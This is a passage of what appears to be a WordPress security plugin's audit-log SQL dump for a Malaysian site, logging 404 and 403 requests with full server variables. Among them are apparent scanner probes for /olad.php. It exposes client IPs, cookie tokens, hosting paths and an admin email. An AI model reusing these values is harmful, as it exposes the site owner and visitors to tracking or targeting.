Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFmm4JA@BHzIZKM8@MItAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569810075.7747\";s:12:\"REQUEST_TIME\";s:10:\"1569810075\";}}','notice','2019-09-30 02:21:19','2019-09-30 02:21:16',35599232,37398280,'https://bintara.com.my/wp-admin.php',1,0,'175.142.118.43'),(27335,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"5\";s:13:\"H2_STREAM_TAG\";s:5:\"342-5\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:248:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wp-settings-time-1=1569484198; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"5\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"342-5\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZFmcc5PbUdT3M9@C7vTDwAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFmcc5PbUdT3M9@C7vTDwAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"50326\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFmcc5PbUdT3M9@C7vTDwAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569810033.3007\";s:12:\"REQUEST_TIME\";s:10:\"1569810033\";}}','notice','2019-09-30 02:20:35','2019-09-30 02:20:33',35192712,36998312,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.142.118.43'),(27334,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/olad.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"140-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"140-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"140-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/olad.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/olad.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZFZoqe6fKO2vmuLqIBwQQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/olad.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/olad.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFZoqe6fKO2vmuLqIBwQQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"192.198.90.198\";s:11:\"REMOTE_PORT\";s:5:\"56234\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/olad.php\";s:10:\"SCRIPT_URL\";s:9:\"/olad.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFZoqe6fKO2vmuLqIBwQQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569806754.8135\";s:12:\"REQUEST_TIME\";s:10:\"1569806754\";}}','notice','2019-09-30 01:25:56','2019-09-30 01:25:55',35159016,36964808,'https://bintara.com.my/olad.php',1,0,'192.198.90.198'),(27333,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/olad.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"399-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"399-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"399-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/olad.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/olad.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZFZmpdbIPYXuQos2m1KFQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/olad.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/olad.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFZmpdbIPYXuQos2m1KFQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"192.198.90.198\";s:11:\"REMOTE_PORT\";s:5:\"55232\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/olad.php\";s:10:\"SCRIPT_URL\";s:9:\"/olad.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFZmpdbIPYXuQos2m1KFQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569806746.8704\";s:12:\"REQUEST_TIME\";s:10:\"1569806746\";}}','notice','2019-09-30 01:25:50','2019-09-30 01:25:47',35550496,37359688,'https://bintara.com.my/olad.php',1,0,'192.198.90.198'),(27332,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"404-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"32757FAB-200A-4E04-BCFC-A9902B2F7125\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"404-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFYcpdbIPYXuQos2m1JWwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"49436\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFYcpdbIPYXuQos2m1JWwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569806450.3605\";s:12:\"REQUEST_TIME\";s:10:\"1569806450\";}}','notice','2019-09-30 01:20:53','2019-09-30 01:20:50',35903320,37698240,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.43'),(27331,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3E977599-C293-48B1-A828-278D271E80EF\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFRKs5PbUdT3M9@C7vLfAAAAU0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"64642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFRKs5PbUdT3M9@C7vLfAAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569804586.6701\";s:12:\"REQUEST_TIME\";s:10:\"1569804586\";}}','notice','2019-09-30 00:49:49','2019-09-30 00:49:47',35501416,37308496,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.43'),(27330,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"993605E1-52B7-4F0D-8A0A-92650016BCE6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFO75dbIPYXuQos2m1DwQAAAYA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"53223\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFO75dbIPYXuQos2m1DwQAAAYA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569804015.741\";s:12:\"REQUEST_TIME\";s:10:\"1569804015\";}}','notice','2019-09-30 00:40:19','2019-09-30 00:40:16',35894040,37697960,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.43'),(27329,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; 